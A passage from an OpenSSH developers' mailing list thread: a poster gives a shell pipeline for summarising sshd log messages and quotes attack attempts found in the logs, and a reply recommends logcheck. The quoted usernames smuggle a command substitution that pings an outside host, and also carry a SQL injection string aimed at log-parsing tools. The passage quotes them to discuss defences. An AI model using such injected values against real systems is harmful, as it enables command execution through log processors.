[...]
journalctl -t sshd -o cat \ | grep -v '^Accepted ' \ | sed -E 's/[Uu]ser \S+/user .../' \ | sed -E 's/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/0.0.0.0/' \ | sed -E 's/port\s+[0-9]+/port 0/' \ | sed -E 's/".*"/"..."/' \ | sed -E 's/Change of username or service not allowed: .+/Change of username or service not allowed: .../' \ | sed -E 's/Their offer: .+/Their offer: .../' \ | sort -u I found a select few attempts to mess with, identify, or exploit log parsing IDS/IPS software like fail2ban (and feel confirmed in my choice of an alternative solution with far less attack surface, see my other mail): Invalid user $(ping -c 1 16e939dc.ad.xspzo.com) from ... Invalid user ' $(ping -c 1 16e939dc.ad.xspzo.com) from ... Invalid user ' or '1'='1' - from 176.100.42.41
[...] May I suggest, you take a look at logcheck(8). It seems, that this what you are looking for. _______________________________________________ openssh-unix-dev mailing list openssh-unix-dev@xxxxxxxxxxx https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev
